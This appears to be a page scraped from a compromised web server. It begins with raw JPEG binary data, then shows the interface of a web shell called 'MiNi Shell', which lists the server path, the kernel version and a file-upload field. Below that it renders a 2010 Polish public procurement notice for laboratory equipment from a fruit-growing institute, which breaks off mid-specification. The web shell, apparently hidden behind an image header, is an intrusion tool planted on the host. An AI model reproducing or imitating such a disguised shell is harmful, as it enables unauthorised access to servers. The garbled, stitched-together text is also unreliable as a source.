JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100519/135786-N-2010.html

<p class="kh_header"><b>Skierniewice: Dostawa aparatury badawczej i urządzeń laboratoryjnych</b><br>
<b>Numer ogłoszenia: 135786 - 2010; data zamieszczenia: 19.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Sadownictwa i Kwiaciarstwa im. Szczepana Pieniążka , ul. Pomologiczna 18, 96-100 Skierniewice, woj. łódzkie, tel. 046 8332021, faks 046 8333228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.insad.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa aparatury badawczej i urządzeń laboratoryjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
sprzedaż i dostawa fabrycznie nowej aparatury badawczej i urządzeń laboratoryjnych wraz z ich instalacją w miejscu użytkowania oraz instruktażem stanowiskowym pracowników w zakresie obsługi. 
Pozycja nr 1 - Zestaw do identyfikacji i charakteryzacji fenotypowej mikroorganizmów glebowych wraz z komputerem i oprogramowaniem
Pozycja nr 2 - Zestaw do krioprezerwacji
Pozycja nr 3 - Suszarki (sterylizatory) 2 szt. 
Pozycja nr 4 - Fitotrony 4 szt. 
Pozycja nr 5 - Wytrząsarka wraz z akcesoriami 
Pozycja nr 6 - Urządzenie do pomiaru fluorescencji chlorofilu wraz z oprogramowaniem
Wykonawca zobowiązany jest do zapewnienia serwisu gwarancyjnego i pogwarancyjnego na terenie Polski posiadającego autoryzację producenta urządzenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2, 44.61.20.00-3, 33.19.11.00-6, 38.43.61.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - w niniejszym postępowaniu Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. 
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej dwie dostawy aparatury badawczej w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty, opisane w części 9 specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym - w niniejszym postępowaniu Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia - w niniejszym postępowaniu Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  dotyczące sytuacji ekonomicznej i finansowej - w niniejszym postępowaniu Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Folder i opis techniczny zawierający dane umożliwiające porównanie parametrów technicznych oferowanych urządzeń z wymaganiami SIWZ</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Możliwość zmiany wysokości wynagrodzenia w przypadku zmiany urzędowej stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
2. Możliwość zmiany terminu dostawy w przypadku wystąpienia zdarzeń losowych, niezależnych od Stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.insad.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Sadownictwa i Kwiaciarstwa im. Szczepana Pieniążka, Dział Zamówień  Publicznych i Inwestycji, 96-100 Skierniewice, ul. Pomologiczna 18, pok. 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2010 godzina 10:00, miejsce: Instytut Sadownictwa i Kwiaciarstwa im. Szczepana Pieniążka, 96-100 Skierniewice, ul. Pomologiczna 18, pok. 21 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy projektu badawczego pt. Opracowanie innowacyjnych produktów 
i technologii dla ekologicznej uprawy roślin sadowniczych, nr umowy UDA-POIG.01.03.01-00-109/08-00, współfinansowanego przez UNIĘ EUROPEJSKĄ ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Działania 1.3. Programu Operacyjnego Innowacyjna Gospodarka, Poddziałanie 1.3.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pozycja nr 1 - Zestaw do identyfikacji i charakteryzacji fenotypowej mikroorganizmów glebowych wraz z komputerem i oprogramowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw musi zawierać:
- Testy do grzybów strzępkowych, drożdży, promieniowców, bakterii gram dodatnich i gram ujemnych (test do identyfikacji bakterii powinien znajdować się na pojedynczej płytce i składać się minimum z 95 testów biochemicznych, w tym z minimum 70 testów analizujących metabolizm różnych związków węgla. Do analizowanych związków węgla powinny wchodzić: cukry, aminokwasy, kwasy karboksylowe, kwasy tłuszczowe, estry, fosfoheksozy. Testy powinny także określać: tolerancję mikroorganizmów na stężenie NaCl, kwasu mlekowego, jonów wodorowych oraz na odróżnienie bakterii gram dodatnich od gram ujemnych);
- Testy do oszacowania populacji mikroorganizmów glebowych (testy pozwalające na oszacowanie populacji mikroorganizmów glebowych powinny znajdować się na pojedynczej płytce i składać się z minimum 95 testów biochemicznych analizujących metabolizm minimum 30 różnych związków węgla);
- Czytnik płytek i minimum 50 płytek do identyfikacji mikroorganizmów oraz minimum 25 płytek do oszacowywania populacji mikroorganizmów;
- Mętnościomierz (turbidymetr); 
- Pipeta wielokanałowa wraz z zestawem tipsów;
- Komputer z systemem i oprogramowaniem w języku angielskim (Oprogramowanie powinno obsługiwać czytnik płytek oraz zawierać bazę danych pozwalającą na zidentyfikowanie badanych mikroorganizmów. Baza danych powinna zawierać dane dotyczące: minimum 1400 gatunków bakterii gram pozytywnych i gram negatywnych, oraz minimum 400 gatunków grzybów i drożdży).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena techniczna - 30</li>
<li>3. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pozycja nr 2 - Zestaw do krioprezerwacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw musi zawierać:
- 2 zbiorniki kriogeniczne do przechowywania preparatów biologicznych: pojemność 
30 - 35  litrów,  możliwość przechowania 1100 - 1400 kriofiolek o poj. 2ml, czas pracy minimum 70 - 80 dni
- 2 zbiorniki do przechowywania ciekłego azotu: pojemność 30 - 35 litrów, jeden ze zbiorników wyposażony w podajnik azotu z wężem, oba zbiorniki na podstawie na kółkach
- 1 pojemnik do transportu zamrożonego materiału biologicznego: pojemność 7 - 9 litrów, czas transportu do 10 dni, ilość kriofiolek o poj. 2ml 480 - 520 szt.
- Pojemniki dewara przeznaczone do krótkotrwałego przechowywania ciekłego azotu oraz suchego lodu:  pojemniki 2 x 1 litr, 2 x 2 litry oraz 2 x 3 litry, odporne na chemikalia, posiadające pokrywkę i uchwyt
- Butle do azotu powinny posiadać legalizację.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pozycja nr 3 - Suszarki (sterylizatory) 2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane parametry techniczne:
- sterylizacja suchym, gorącym powietrzem
- wymuszony obieg powietrza
- pojemność: 100-120 litrów
- drzwi pełne
- temperatura pracy od 50C powyżej temperatury otoczenia do minimum 2500C
- zewnętrzny wyświetlacz 
- komora ze stali nierdzewnej
- waga do 65 kg (ze względu na nośność pomieszczenia docelowego)
- regulacja temperatury co 10C
- ilość półek: 2 - 3 z możliwością regulacji
- regulacja obrotów wentylatora 
- automatyczne wyłączenie wentylatora po zakończeniu programu
- możliwość cyklicznego powtarzania nastawionego programu
- możliwość zapamiętania dowolnych programów użytkownika
- nastawienie opóźnienia startu pracy urządzenia
- możliwość podglądu zadanych i bieżących parametrów podczas pracy urządzenia
- sygnalizacja dźwiękowa przekroczenia zadanej temperatury
- kontrola zaniku napięcia
- alarm dźwiękowy
- napięcie zasilania 230V
- programowanie w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Temperatura pracy - 10</li>
<li>3. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pozycja nr 4 - Fitotrony 4 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane parametry techniczne:
- Fitotron szafowy, dwukomorowy o pojemności łącznej komór od 600 do 750 litrów
- Komory o jednakowej lub nieznacznie różniącej się pojemności
- Niezależne sterowanie pracy obu komór
- Mikroprocesorowy sterownik temperatury, wilgotności i cyklu dzień/noc
- Wyświetlanie temperatury, wilgotności, cykli dzień/noc - cyfrowy wyświetlacz LCD
- Alarmy: wizualny i dźwiękowy, możliwość wyprowadzenia do innych pomieszczeń
- Temperatura regulowana co 1°C
- Zakres temperatur roboczych:
- Dwa fitotrony pracujące w zakresie temperatury od +1°C do +60°C 
- Dwa fitotrony pracujące w zakresie temperatury od +10°C do +60°C 
- Zabezpieczenie przez przekroczeniem zaprogramowanych temperatur maksymalnych
- Wilgotność w komorze regulowana co 1% w zakresie: od co najmniej 40% do co najmniej 90%, wymagana możliwość otrzymania wilgotności względnej (RH) poniżej poziomu wilgotności względnej otoczenia
- Wymuszony obieg powietrza w komorach
- Wewnętrzne oświetlenie nadpółkowe, bezpośrednio nad materiałem hodowlanym
- Komora hodowlana wykonana z niekorodującego metalu
- Półki o regulowanej wysokości zawieszenia (co najmniej 2 na fitotron)
- Izolacja termiczna ścian
- Bezfreonowy czynnik chłodzący
- W fitotronach pracujących w zakresie od +10°C do +60°C powinny być zainstalowane gniazda zasilania (co najmniej 1 w każdej komorze hodowlanej)
- Napięcie zasilania 230V, pobór mocy nie większy niż 3,5KW 
- Ze względu na wymiary otworu drzwiowego - 74 cm szerokości i  175 cm wysokości, wymiary zewnętrzne urządzenia: szerokość urządzenia (bez opakowania) nie może być większa niż 70 cm, urządzenie po instalacji akcesoriów/dodatkowego wyposażenia może mieć większą szerokość. Dopuszczalna maksymalna wysokość urządzenia: 200 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Pojemność - 20</li>
<li>3. Okres gearancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pozycja nr 5 - Wytrząsarka wraz z akcesoriami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane parametry techniczne:
- maksymalne wymiary urządzenia (szer./dł.) nie większe niż: 550 mm x 630 mm (podyktowane dostępnym miejscem)
- wymiary platformy (szer./dł.): minimum 450 mm x 450 mm
- maksymalna masa urządzenia (bez wyposażenia dodatkowego) nie większa niż 25 kg (ze względu na nośność pomieszczenia docelowego)
- maksymalne obciążenie urządzenia nie mniejsze niż 12 kg
- ruch platformy postępowo zwrotny
- prędkość wytrząsania od min. 20 do max. 300 obrotów na minutę
- amplituda wytrząsania: 30 mm
- sterowanie cyfrowe z wyświetlaczem
- napięcie zasilania 230V
- mata antypoślizgowa oraz platforma perforowana z możliwością przemiennego ich stosowania
- platforma perforowana wraz z koszami do kolb Erlenmeyera (15 sztuk koszy do kolb o pojemności 250-300 ml, 10 sztuk koszy do kolb o pojemności 500 ml) oraz dwoma statywami do probówek o średnicy od 12 do 17 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.61.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pozycja nr 6 - Urządzenie do pomiaru fluorescencji chlorofilu wraz z oprogramowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane parametry techniczne:
- naświetlanie światłem aktynicznym o natężeniu nie mniejszym niż 2900 umol m-2 s-1 
z rozdzielczością czasową minimum 100 kHz
- możliwość preiluminacji próbki bezpośrednio przed pomiarem światłem aktynicznym
- akumulatory wewnętrzne zapewniające możliwość wykonania bez ładowania minimum 1000 pomiarów
- źródło światła aktynicznego posiadające możliwość kalibracji natężenia światła 
- pomiar takich parametrów jak: 
